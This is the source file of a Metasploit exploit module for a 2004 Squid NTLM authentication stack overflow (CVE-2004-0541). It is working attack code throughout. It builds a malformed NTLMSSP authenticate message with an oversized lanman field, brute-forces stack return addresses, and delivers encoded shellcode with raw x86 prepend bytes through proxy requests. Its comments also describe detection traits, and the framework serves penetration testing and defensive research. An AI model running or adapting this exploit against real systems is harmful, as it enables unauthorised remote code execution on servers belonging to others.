rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Brute provides the address-walking loop that calls brute_exploit;
  # Tcp provides connect / sock / disconnect.
  include Msf::Exploit::Brute
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints,
  # a single brute-force target described by a start/stop address pair)
  # and the BruteWait advanced option.
  #
  # @param info [Hash] base info hash merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Squid NTLM Authenticate Overflow',
        'Description' => %q{
          This is an exploit for Squid\'s NTLM authenticate overflow
          (libntlmssp.c). Due to improper bounds checking in
          ntlm_check_auth, it is possible to overflow the 'pass'
          variable on the stack with user controlled data of a user
          defined length. Props to iDEFENSE for the advisory.
        },
        'Author' => 'skape',
        'References' => [
          [ 'CVE', '2004-0541'],
          [ 'OSVDB', '6791'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
          [ 'BID', '10500'],
        ],
        'Privileged' => false,
        'Payload' => {
          # Payload sizing and prefix constraints handed to the framework;
          # Space bounds the encoded payload, MinNops the NOP sled.
          'Space' => 256,
          'MinNops' => 16,
          # Raw x86 prefix bytes; presumably placed before the encoded
          # payload / encoder by the framework — semantics not documented here.
          'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
          'PrependEncoder' => "\x83\xec\x7f",

        },
        'Platform' => %w{linux},
        'Targets' => [
          [
            'Linux Bruteforce',
            {
              'Platform' => 'linux',
              # Address range walked by Msf::Exploit::Brute; each step is
              # passed to brute_exploit as addresses['Ret'] / addresses['Valid'].
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
                'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
                # NOTE(review): Step 0 presumably lets the Brute mixin choose
                # the increment — confirm against Msf::Exploit::Brute.
                'Step' => 0
              }
            },
          ],
        ],
        'DisclosureDate' => '2004-06-08',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_advanced_options(
      [
        # We must wait 15 seconds between each attempt so as to prevent
        # squid from exiting completely after 5 crashes.
        OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
      ]
    )
  end

  # One brute-force attempt, invoked by the Brute mixin with a candidate
  # address set. Opens a TCP connection, sends the two NTLM proxy-auth
  # requests (negotiate, then authenticate), starts the payload handler
  # and closes the socket. Each attempt is a fresh connection, so a
  # defender sees repeated NTLM negotiate/authenticate pairs from one
  # client, roughly BruteWait seconds apart.
  #
  # @param addresses [Hash] candidate addresses for this attempt;
  #   'Ret' is printed here and both 'Ret' and 'Valid' are consumed by
  #   transmit_authenticate
  # @return [void]
  def brute_exploit(addresses)
    # Random host label of 0..127 alpha characters (rand(128) may yield 0).
    site = "http://" + rand_text_alpha(rand(128)) + ".com"

    print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
    connect

    # NOTE: method name is misspelled ("trasnmit"); kept as-is because the
    # definition below uses the same spelling.
    trasnmit_negotiate(site)
    transmit_authenticate(site, addresses)

    handler
    disconnect
  end

  # Sends the first NTLM message (NTLMSSP_NEGOTIATE, type 1) as a
  # base64 Proxy-Authorization header on a GET through the proxy.
  # The message is a fixed 32-byte blob; the workgroup and workstation
  # length/offset fields are set to 1. Nothing here is
  # malformed — the oversized field arrives in transmit_authenticate.
  #
  # @param site [String] the URL placed in the request line
  # @return [void]
  def trasnmit_negotiate(site)
    negotiate =
      "NTLMSSP\x00" + # NTLMSSP identifier
      "\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE
      "\x07\x00\xb2\x07" + # flags
      "\x01\x00\x09\x00" + # workgroup len/max (1)
      "\x01\x00\x00\x00" + # workgroup offset (1)
      "\x01\x00\x03\x00" + # workstation len/max (1)
      "\x01\x00\x00\x00" # workstation offset (1)

    print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
    req =
      "GET #{site} HTTP/1.1\r\n" +
      "Proxy-Connection: Keep-Alive\r\n" +
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
      "\r\n"
    sock.put(req)
  end

  # Sends the second NTLM message (NTLMSSP_AUTHENTICATE, type 3) on the
  # same connection. The "lanman response" length/max fields are set to
  # the combined size of the overflow buffer and the encoded payload, and
  # that data follows the fixed header at offset 56. Per the module
  # description this is the field ntlm_check_auth failed to bounds-check;
  # for detection, a type 3 message whose lanman response length is far
  # larger than a normal response, with high-entropy data after the
  # 56-byte header, is the distinguishing trait of this request.
  #
  # @param site [String] the URL placed in the request line
  # @param addresses [Hash] reads 'Ret' and 'Valid', each packed as a
  #   32-bit little-endian integer
  # @return [void]
  def transmit_authenticate(site, addresses)
    # 0x20 filler bytes, then the two candidate addresses, then a
    # 4-byte trailer (0xff, 0, 0, 0).
    overflow =
      rand_text_alphanumeric(0x20) +
      [addresses['Ret']].pack('V') +
      [addresses['Valid']].pack('V') +
      "\xff\x00\x00\x00"
    shellcode = payload.encoded
    # 16-bit little-endian length used for both the len and max fields.
    pass_len = [overflow.length + shellcode.length].pack('v')
    authenticate =
      "NTLMSSP\x00" + # NTLMSSP identifier
      "\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE
      pass_len + pass_len + # lanman response len/max
      "\x38\x00\x00\x00" + # lanman response offset (56)
      "\x01\x00\x01\x00" + # nt response len/max (1)
      "\x01\x00\x00\x00" + # nt response offset (1)
      "\x01\x00\x01\x00" + # domain name len/max (1)
      "\x01\x00\x00\x00" + # domain name offset (1)
      "\x01\x00\x01\x00" + # user name (1)
      "\x01\x00\x00\x00" + # user name offset (1)
      "\x00\x00\x00\x00" + # session key
      "\x8b\x00\x00\x00" + # session key
      "\x06\x82\x00\x02" + # flags
      overflow + shellcode

    print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
    req =
      "GET #{site} HTTP/1.1\r\n" +
      "Proxy-Connection: Keep-Alive\r\n" +
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
      "\r\n"
    sock.put(req)
  end
end